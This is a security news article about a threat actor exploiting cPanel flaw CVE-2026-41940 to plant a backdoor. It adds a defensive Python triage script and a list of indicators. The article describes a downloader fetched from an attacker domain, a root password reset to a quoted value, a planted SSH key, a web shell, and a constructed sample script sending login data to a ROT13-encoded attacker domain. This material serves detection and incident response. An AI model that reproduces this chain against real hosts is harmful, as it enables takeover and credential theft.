Zero-day | May 11, 2026

cPanel CVE-2026-41940 Under Active Exploitation to Deploy Filemanager Backdoor

CVE-2026-41940 cPanel flaw exploited to deploy Filemanager backdoor across 2,000+ attacker IPs.

Summary

Threat actor Mr_Rot13 is exploiting CVE-2026-41940, a critical authentication bypass vulnerability in cPanel and WebHost Manager, to deploy a cross-platform backdoor called Filemanager. The attack chain modifies root credentials, implants SSH keys, injects malicious JavaScript to steal login credentials, and collects sensitive data including SSH keys and database passwords. QiAnXin XLab reports over 2,000 attacker IPs globally are conducting automated exploitation, with evidence suggesting the threat actor has been operating since at least 2020.

Full text

By Ravie Lakshmanan, May 11, 2026 (Vulnerability / Ransomware)

A threat actor tracked as Mr_Rot13 has been linked to the exploitation of a recently disclosed critical cPanel flaw to deploy a backdoor codenamed Filemanager on compromised environments. The attack exploits CVE-2026-41940, a vulnerability in cPanel and WebHost Manager (WHM) that results in an authentication bypass and allows remote attackers to gain elevated control of the control panel.

According to a new report from QiAnXin XLab, the flaw has been exploited by a number of threat actors since shortly after its public disclosure late last month, with the intrusions leading to cryptocurrency mining, ransomware, botnet propagation, and backdoor implantation.

"Monitoring data shows that more than 2,000 attacker source IPs worldwide are currently involved in automated attacks and cybercrime activities targeting this vulnerability," XLab researchers said. "These IPs are distributed across multiple regions globally, primarily originating from Germany, the United States, Brazil, the Netherlands, and other regions."

Further analysis of the ongoing exploitation activity uncovered a shell script that uses wget or curl to download a Go-based infector from a remote server ("cp.dene.de[.]com"). The infector first changes the compromised cPanel system's root password to "123Qwe123C," plants an SSH public key for persistent access, and then drops a PHP web shell that supports file upload/download and remote command execution.

The web shell is then used to inject JavaScript that serves a customized login page to harvest credentials and send them to an attacker-controlled domain ("wrned[.]com"), whose name is stored in the script in ROT13-encoded form. Once the details are transmitted, the chain culminates in the deployment of a cross-platform backdoor capable of infecting Windows, macOS, and Linux systems.

The infector also collects sensitive information from the compromised host, including bash history, SSH data, device information, database passwords, and cPanel virtual aliases (valiases), and exfiltrates it to a three-member Telegram group created by a user named "0xWR." In the infection sequence analyzed by XLab, Filemanager is delivered via a shell script downloaded from the "wpsock[.]com" domain. The backdoor supports file management, remote command execution, and shell functionality.

There are signs that the threat actor behind the operation has been active quietly for years. This assessment rests on the fact that the command-and-control (C2) domain embedded in the JavaScript was already used by a PHP-based backdoor ("helper.php") uploaded to VirusTotal in April 2022; the domain itself was first registered in October 2020.

"Over the six years from 2020 to the present, the detection rate of Mr_Rot13's related samples and infrastructure across security products has remained extremely low," XLab said.
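The chain described above (downloader, root-password reset, planted SSH key, injected login script with a ROT13-obfuscated C2 domain) gives an incident responder three concrete things to check on a cPanel host. The following is an added example written for this page; it is not code from QiAnXin XLab, cPanel, or the actor. Only the three domains come from the article. The login-page fragment, the authorized_keys file and the shadow entry are constructed samples, and the way the injected script wraps its ROT13 string is an assumption. The point worth taking from it is that a grep for "wrned.com" misses the obfuscated form, so the scan also searches for the ROT13 of each indicator.

```python
"""Host-triage helpers for the cPanel intrusion chain described above.

Example code added for this page; it is not code from QiAnXin XLab, cPanel,
or the threat actor.  Only the three domains come from the article; every
sample input below is constructed.
"""
import codecs
import datetime
import re

# Indicators quoted in the article, with defanging brackets removed.
IOC_DOMAINS = ("cp.dene.de.com", "wrned.com", "wpsock.com")

# Key type followed by the base64 blob; options prefixes are tolerated by search().
KEY_RE = re.compile(
    r"(ssh-(?:rsa|ed25519|dss)|ecdsa-sha2-nistp\d{3})\s+([A-Za-z0-9+/=]+)"
)


def rot13(s: str) -> str:
    """ROT13 is its own inverse, so the same call encodes and decodes."""
    return codecs.encode(s, "rot_13")


def find_domain_iocs(text: str) -> dict:
    """Map each IoC domain found in *text* to the forms it appeared in.

    The injected login-page JavaScript hides its C2 domain with ROT13, so a
    plain search for "wrned.com" misses it; probing for rot13(domain) as well
    catches the obfuscated form.
    """
    hits = {}
    for dom in IOC_DOMAINS:
        forms = [name for name, probe in (("plain", dom), ("rot13", rot13(dom)))
                 if probe in text]
        if forms:
            hits[dom] = forms
    return hits


def foreign_ssh_keys(authorized_keys: str, allowed_blobs) -> list:
    """Return every authorized_keys entry whose key blob is not allowlisted.

    The infector plants an SSH public key for persistence.  Comparing blobs
    (not comments, which the attacker chooses) against the keys the operator
    actually provisioned surfaces the implant.
    """
    foreign = []
    for line in authorized_keys.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        m = KEY_RE.search(line)
        if m and m.group(2) not in allowed_blobs:
            foreign.append(line)
    return foreign


def root_password_change_date(shadow: str):
    """Return the ISO date of root's last password change from /etc/shadow.

    Field 3 of a shadow entry is days since 1970-01-01.  The infector resets
    root's password, so a change date matching no administrator action is a
    strong signal.  Returns None if the field is empty or absent.
    """
    for line in shadow.splitlines():
        fields = line.split(":")
        if fields[0] == "root" and len(fields) > 2 and fields[2].isdigit():
            changed = datetime.date(1970, 1, 1) + datetime.timedelta(days=int(fields[2]))
            return changed.isoformat()
    return None


# Constructed samples (not captured artifacts).  How the script wraps the
# ROT13 string is an assumption; only the domain is from the article.
SAMPLE_LOGIN_HTML = (
    '<form id="login_form" action="/login/">...</form>\n'
    '<script>var c = r13("jearq.pbz"); post(c, document.forms[0]);</script>\n'
)
SAMPLE_AUTHORIZED_KEYS = """\
# provisioned by the hosting team
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIOPSKEYCONSTRUCTED0000000000000000000000 ops@example
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC0IMPLANTEDCONSTRUCTED000000000000000000 root@localhost
"""
ALLOWED_BLOBS = {"AAAAC3NzaC1lZDI1NTE5AAAAIOPSKEYCONSTRUCTED0000000000000000000000"}
SAMPLE_SHADOW = "root:$6$constructed$hashhash:20584:0:99999:7:::\nbin:*:18000:0:99999:7:::\n"


def triage(login_html=SAMPLE_LOGIN_HTML, authorized_keys=SAMPLE_AUTHORIZED_KEYS,
           allowed_blobs=ALLOWED_BLOBS, shadow=SAMPLE_SHADOW) -> dict:
    """Run all three checks and return the findings in one dict."""
    return {
        "domain_iocs": find_domain_iocs(login_html),
        "foreign_ssh_keys": foreign_ssh_keys(authorized_keys, allowed_blobs),
        "root_password_changed": root_password_change_date(shadow),
    }


if __name__ == "__main__":
    for name, finding in triage().items():
        print(f"{name}: {finding}")
```

On a live host, feed `triage()` the served login page (fetched with curl, since the injection is applied server-side by the web shell), `/root/.ssh/authorized_keys` and `/etc/shadow`; the allowlist of key blobs has to come from the operator's provisioning records, not from the host being examined.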

Indicators of Compromise

  • cve — CVE-2026-41940
  • domain — cp.dene.de.com
  • domain — wrned.com
  • domain — wpsock.com
  • malware — Filemanager
  • malware — helper.php

Entities

  • Mr_Rot13 (threat_actor)
  • cPanel (product)
  • WebHost Manager (WHM) (product)
  • QiAnXin XLab (vendor)